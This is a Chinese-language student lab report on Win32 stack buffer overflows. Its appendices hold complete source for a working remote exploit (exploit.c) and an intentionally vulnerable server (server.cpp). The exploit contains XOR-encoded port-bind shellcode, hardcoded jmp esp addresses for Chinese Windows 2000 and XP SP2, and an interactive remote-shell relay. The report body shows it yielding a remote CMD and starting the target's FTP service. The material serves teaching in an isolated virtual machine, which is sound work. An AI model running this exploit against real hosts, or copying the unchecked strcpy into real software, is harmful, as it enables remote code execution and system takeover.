
网络安全缓冲区溢出技术实验报告

网络实验报告
一、实验目的及要求
1、目的:了解和掌握 Win32 平台缓冲区溢出原理;学会使用 Win32 平台 Shellcode 技术。

2、内容及要求以windows 2000 server虚拟机为测试对象,修改server.cpp和exploit.c,利用shellcode port bind给出的shellcode,远程获得CMD,并启动目标机器的ftp服务。

二、仪器用具:计算机(分别装有 Windows Server 2000 和 Windows 7 操作系统)。本实验使用 VMware 8.0 虚拟机,在同一台电脑上安装两个操作系统。

三、实验方法与步骤在实验开始前,首先编写可能产生缓冲区溢出的程序(server.cpp)和测试程序(exploit.c)。

在server.cpp中能够产生缓冲区溢出的程序片段如下:void overflow(char * s,int size){char s1[50];printf("receive %d bytes",size);s[size]=0;strcpy(s1,s);} 溢出原因:s1 只有 50 字节,而 strcpy 不做长度检查,会一直拷贝到 s 中的第一个 0 字节为止,因此超过 50 字节的输入就会覆盖栈上保存的 EBP 和函数返回地址。另外 s[size]=0 在 size 等于接收缓冲区长度(2048)时会越界写入 1 字节,这是一个与实验目的无关的额外缺陷。这两个程序的完整代码见附件。

由于本实验是在虚拟机环境下测试的,所以在开始实验前,分别记下两个系统的IP地址:运行server程序的系统IP地址为:192.168.209.131;运行exploit程序的系统IP地址为:192.168.209.1。实验的过程如下:
1. 在windows 2000系统下分别编译server.cpp和exploit.c程序,详细过程如下:
C:\test>cl server.cpp
C:\test>cl exploit.c
编译完成后分别产生exploit.exe、exploit.obj、server.exe、server.obj,截图如下图1所示:图 1
2. 在windows 2000系统中运行服务程序server.exe(由server.cpp编译得到):
C:\test>server.exe
截图如下图2所示:图 2
3. 将编译好的exploit.exe拷贝到windows 7系统中来测试。
4. 在windows 7系统中运行exploit.exe程序,如下(8888 是 server.cpp 中监听的端口):
D:\client\exploit.exe 192.168.209.131 8888
截图如下图3所示:图3
这样就可以获得目标主机的CMD了,接下来的任务是开启目标主机的FTP服务。

5. 紧接着上面的步骤,在获得CMD的情况下,运行如下的命令来开启目标机器的FTP服务(注意必须使用 ASCII 双引号,中文弯引号会使 cmd 无法识别服务名;得到的 CMD 是在被劫持的 server.exe 进程中启动的,因此继承该进程的权限,能否启动服务取决于该账户的权限):
C:\test>net start "FTP Publishing Service"
截图如下图4所示:图4
四、实验结果及讨论
从上面的截图可以看出,实验通过exploit.exe程序顺利地获取了目标机器的CMD并启动了FTP服务。

由于 jmp esp 指令位于系统 DLL 中,而该 DLL 在不同版本、不同语言、不同补丁级别的 Windows 下的加载地址不同,因此 windows xp 与 windows 2000 下程序的差别在于 #define JUMPESP 的定义。

windows2000下可以采用如下的定义:#define JUMPESP "\x12\x45\xfa\x7f"(即地址 0x7ffa4512 的小端字节序);windows xp sp2可以采用下面的定义:#define JUMPESP "\xed\x1e\x96\x7c"(即 0x7c961eed)。代码注释表明这些地址针对中文版系统,其他语言版本需要重新查找。由于程序是使用VC6编译器来编译的,它保持4字节栈对齐:s1[50] 被补齐为 52 字节,加上 4 字节保存的 EBP,返回地址正好位于攻击缓冲区偏移 56 处(exploit.c 中 strcpy(Buff+56, JUMPESP) 的依据),因此服务程序server.cpp并不需要任何改动。若改用其他编译器或优化选项,或启用 /GS 栈保护,该偏移会改变甚至使返回地址覆盖无法生效;在 Vista 及之后启用 ASLR 的系统上,固定的 jmp esp 地址也不再可靠。

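/* ===== Appendix: exploit.c (client side) ===== */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")

/* Address of a "jmp esp" instruction in a system DLL on the target,
 * written little-endian: 0x7ffa4512 for the Chinese-language Windows 2000
 * used in this lab. The value is OS/language/service-pack specific; the
 * report body gives the Windows XP SP2 value. */
#define JUMPESP "\x12\x45\xfa\x7f"

/* Layout of the 1024-byte attack buffer, derived from overflow() in
 * server.cpp compiled with VC6: char s1[50] is padded to 52 bytes, then
 * the saved EBP (4 bytes), so the return address sits at offset 56 and ESP
 * after RET points at offset 60, where the shellcode starts. */
#define RET_OFFSET       56
#define SC_OFFSET        60
#define BIND_PORT        4444   /* port the bind shellcode is expected to listen on */
#define CONNECT_TIMEOUT  10     /* seconds */

/* Port-bind shellcode ("shellcode port bind", isno). The first 23 bytes are
 * a decoder (jmp/pop/dec ebx; mov cx,0x123; xor byte [ebx+ecx],0xf8; loop;
 * jmp/call back) that XOR-decodes the remaining 0x123 = 291 bytes in place.
 * The encoded bytes contain no 0x00, which matters because the server
 * copies the buffer with strcpy(). 314 bytes total. */
char shellcode[] =
"\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x23\x01\x80\x34\x0b\xf8\xe2\xfa"
"\xeb\x05\xe8\xeb\xff\xff\xff\x11\x01\xf8\xf8\xf8\xa7\x9c\x59\xc8"
"\xf8\xf8\xf8\x73\xb8\xf4\x73\x88\xe4\x55\x73\x90\xf0\x73\x0f\x92"
"\xfb\xa1\x10\x61\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f"
"\x8b\xca\xa7\xac\x07\xee\x73\x10\x92\xfd\xa1\x10\x78\xf8\xf8\xf8"
"\x1a\x01\x79\x14\x68\xf9\xf8\xf8\xac\x90\xf9\xf9\xf8\xf8\x07\xae"
"\xf4\xa8\xa8\xa8\xa8\x92\xf9\x92\xfa\x07\xae\xe8\x73\x20\xcb\x38"
"\xa8\xa8\x90\xfa\xf8\xe9\xa4\x73\x34\x92\xe8\xa9\xab\x07\xae\xec"
"\x92\xf9\xab\x07\xae\xe0\xa8\xa8\xab\x07\xae\xe4\x73\x20\x90\x9b"
"\x95\x9c\xf8\x75\xec\xdc\x7b\x14\xac\x73\x04\x92\xec\xa1\xcb\x38"
"\x71\xfc\x77\x1a\x03\x3e\xbf\xe8\xbc\x06\xbf\xc4\x06\xbf\xc5\x71"
"\xa7\xb0\x71\xa7\xb4\x71\xa7\xa8\x75\xbf\xe8\xaf\xa8\xa9\xa9\xa9"
"\x92\xf9\xa9\xa9\xaa\xa9\x07\xae\xfc\xcb\x38\xb0\xa8\x07\xae\xf0"
"\xa9\xae\x73\x8d\xc4\x73\x8c\xd6\x80\xfb\x0d\xae\x73\x8e\xd8\xfb"
"\x0d\xcb\x31\xb1\xb9\x55\xfb\x3d\xcb\x23\xf7\x46\xe8\xc2\x2e\x8c"
"\xf0\x39\x33\xff\xfb\x22\xb8\x13\x09\xc3\xe7\x8d\x1f\xa6\x73\xa6"
"\xdc\xfb\x25\x9e\x73\xf4\xb3\x73\xa6\xe4\xfb\x25\x73\xfc\x73\xfb"
"\x3d\x53\xa6\xa1\x3b\x10\xfa\x07\x07\x07\xca\x8c\x69\xf4\x31\x44"
"\x5e\x93\x77\x0a\xe0\x99\xc5\x92\x4c\x78\xd5\xca\x80\x26\x9c\xe8"
"\x5f\x25\xf4\x67\x2b\xb3\x49\xe6\x6f\xf9";

/* Connect to address:port with a bounded wait (ripped from isno).
 *
 * address  dotted-quad IPv4 string; port  TCP port; timeout  seconds to wait.
 * Returns the connected socket (switched back to blocking mode) as an int,
 * or a negative code: -1 socket() failed, -2 unparsable address,
 * -3 select() failed, -4 timed out, -5 connect() reported an error.
 * Callers must receive the result in an int: SOCKET is unsigned on Win32,
 * so "s < 0" on a SOCKET never fires. (32-bit Win32 code; the SOCKET→int
 * cast is lossless there.) */
int Make_Connection(const char *address, int port, int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int ready;
    DWORD nonblock;
    DWORD soerr;
    int soerrlen;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET) {          /* original tested "s < 0", never true for unsigned SOCKET */
        return -1;
    }

    memset(&target, 0, sizeof(target));
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    /* inet_addr() reports a bad address as INADDR_NONE, not 0 */
    if (target.sin_addr.s_addr == INADDR_NONE || target.sin_addr.s_addr == 0) {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons((u_short)port);

    /* Non-blocking connect so the wait can be bounded by select() */
    nonblock = 1;
    ioctlsocket(s, FIONBIO, &nonblock);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s, &wd);
    connect(s, (struct sockaddr *)&target, sizeof(target)); /* WSAEWOULDBLOCK is expected here */

    ready = select((int)s + 1, 0, &wd, 0, &tv);  /* nfds is ignored by Winsock */
    if (ready == -1) {
        closesocket(s);
        return -3;
    }
    if (ready == 0) {
        closesocket(s);
        return -4;
    }

    /* Writable can also mean "connect failed": read the pending error */
    soerr = 0;
    soerrlen = sizeof(soerr);
    if (getsockopt(s, SOL_SOCKET, SO_ERROR, (char *)&soerr, &soerrlen) != 0
        || soerrlen != sizeof(soerr) || soerr != 0) {
        closesocket(s);
        return -5;
    }

    nonblock = 0;                        /* back to blocking mode for recv/send */
    ioctlsocket(s, FIONBIO, &nonblock);
    return (int)s;
}

/* Interactive relay between the local console and the remote shell socket
 * (ripped from TESO code, modified by ey4s for win32).
 * Data arriving on the socket is written to stdout; when nothing is pending
 * for one second, one line of local input is read and sent to the socket.
 * Returns when either side closes or an I/O call fails. */
void shell(int sock)
{
    char buf[512];
    int n;
    fd_set rd;
    struct timeval poll_tv;

    for (;;) {
        /* Build a real fd_set each round. The original overlaid
         * {1, sock} as unsigned long[2] on fd_set, which only matches the
         * Winsock layout when SOCKET is 32-bit. */
        FD_ZERO(&rd);
        FD_SET((SOCKET)sock, &rd);
        poll_tv.tv_sec = 1;
        poll_tv.tv_usec = 0;

        n = select(0, &rd, NULL, NULL, &poll_tv);
        if (n == 1) {
            n = recv(sock, buf, sizeof(buf), 0);
            if (n <= 0) {
                printf("[-] Connection closed.\n");
                return;
            }
            if (fwrite(buf, 1, (size_t)n, stdout) != (size_t)n) {
                printf("[-] Connection closed.\n");
                return;
            }
            fflush(stdout);
        } else {
            /* Nothing pending on the socket (or select failed): block on one
             * line of local input, like the original read(0, ...) did. */
            if (fgets(buf, sizeof(buf), stdin) == NULL) {
                printf("[-] Connection closed.\n");
                return;
            }
            n = (int)strlen(buf);
            if (n <= 0) {
                printf("[-] Connection closed.\n");
                return;
            }
            n = send(sock, buf, n, 0);
            if (n <= 0) {
                printf("[-] Connection closed.\n");
                return;
            }
        }
    }
}

/* Usage: exploit remote_addr remote_port
 * Sends the overflow buffer to server.exe, waits for the bind shellcode to
 * start listening, then connects to it and hands the user an interactive shell.
 * Exit status 0 on a successful shell session, 1 on any failure. */
int main(int argc, char *argv[])
{
    int s, c;               /* int on purpose: Make_Connection returns negative codes */
    int port;
    WSADATA WSAData;
    char Buff[1024];

    if (argc < 3) {
        fprintf(stderr, "Usage: %s remote_addr remote_port", argv[0]);
        exit(1);
    }
    port = atoi(argv[2]);
    if (port <= 0 || port > 65535) {
        fprintf(stderr, "[-] bad port: %s\n", argv[2]);
        exit(1);
    }
    if (WSAStartup(MAKEWORD(1, 1), &WSAData) != 0) {
        printf("[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }

    /* NOP sled everywhere, return address at 56, shellcode at 60.
     * memcpy of sizeof(shellcode) also copies its terminating NUL, which is
     * where the server's strcpy() will stop. The last byte is zeroed too;
     * the original memset(sizeof-1) left it uninitialised and sent it. */
    memset(Buff, 0x90, sizeof(Buff));
    Buff[sizeof(Buff) - 1] = 0;
    memcpy(Buff + RET_OFFSET, JUMPESP, 4);
    memcpy(Buff + SC_OFFSET, shellcode, sizeof(shellcode));

    s = Make_Connection(argv[1], port, CONNECT_TIMEOUT);
    if (s < 0) {
        printf("[-] connect err.\n");
        WSACleanup();
        exit(1);
    }
    if (send(s, Buff, sizeof(Buff), 0) != (int)sizeof(Buff)) {
        printf("[-] send err.\n");
        closesocket(s);
        WSACleanup();
        exit(1);
    }

    Sleep(1000);    /* give the shellcode time to bind BIND_PORT */
    c = Make_Connection(argv[1], BIND_PORT, CONNECT_TIMEOUT);
    if (c < 0) {
        printf("[-] connect err.\n");   /* original called shell() on the error code */
    } else {
        shell(c);
        closesocket(c);
    }
    closesocket(s);
    WSACleanup();
    return c < 0 ? 1 : 0;
}

/* ===== Appendix: server.cpp (vulnerable target) ===== */
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#pragma comment(lib,"ws2_32")

#define LISTEN_PORT 8888

char Buff[2048];    /* receive buffer handed to overflow() */

/* INTENTIONALLY VULNERABLE - this is the lab target, do not "fix" it.
 * s1 is 50 bytes but strcpy() copies s up to its first NUL, so input longer
 * than the frame overwrites the saved EBP and the return address (offset 56
 * under VC6). The caller must pass size < sizeof(Buff) so that the
 * terminator write s[size] = 0 stays inside Buff. */
void overflow(char *s, int size)
{
    char s1[50];
    printf("receive %d bytes", size);
    s[size] = 0;        /* terminate so strcpy() has a stopping point */
    strcpy(s1, s);      /* unbounded copy: the overflow */
}

/* Listen on LISTEN_PORT, accept one client, and echo each received block
 * back after passing it through overflow(). Returns 1 on setup failure. */
int main()
{
    WSADATA wsa;
    SOCKET listenFD, clientFD;
    struct sockaddr_in server;
    int iAddrSize;
    int ret;
    int lBytesRead;     /* int, not unsigned long: recv() returns SOCKET_ERROR (-1),
                           which as unsigned passed the "<= 0" test and reached s[-1] = 0 */

    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
        return 1;
    }
    /* WSASocket() with flags 0 yields a non-overlapped socket (kept from original) */
    listenFD = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
    if (listenFD == INVALID_SOCKET) {
        WSACleanup();
        return 1;
    }

    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_port = htons(LISTEN_PORT);
    server.sin_addr.s_addr = INADDR_ANY;
    ret = bind(listenFD, (struct sockaddr *)&server, sizeof(server));
    if (ret == SOCKET_ERROR) {
        closesocket(listenFD);
        WSACleanup();
        return 1;
    }
    ret = listen(listenFD, 2);
    if (ret == SOCKET_ERROR) {
        closesocket(listenFD);
        WSACleanup();
        return 1;
    }
    iAddrSize = sizeof(server);
    clientFD = accept(listenFD, (struct sockaddr *)&server, &iAddrSize);
    if (clientFD == INVALID_SOCKET) {
        closesocket(listenFD);
        WSACleanup();
        return 1;
    }

    for (;;) {
        /* leave one byte free: overflow() writes Buff[size] = 0 */
        lBytesRead = recv(clientFD, Buff, sizeof(Buff) - 1, 0);
        if (lBytesRead <= 0) {
            break;
        }
        printf("\nfd = %x\n", (unsigned)clientFD);
        overflow(Buff, lBytesRead);
        ret = send(clientFD, Buff, lBytesRead, 0);
        if (ret <= 0) {
            break;
        }
    }
    closesocket(clientFD);
    closesocket(listenFD);
    WSACleanup();
    return 0;
}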
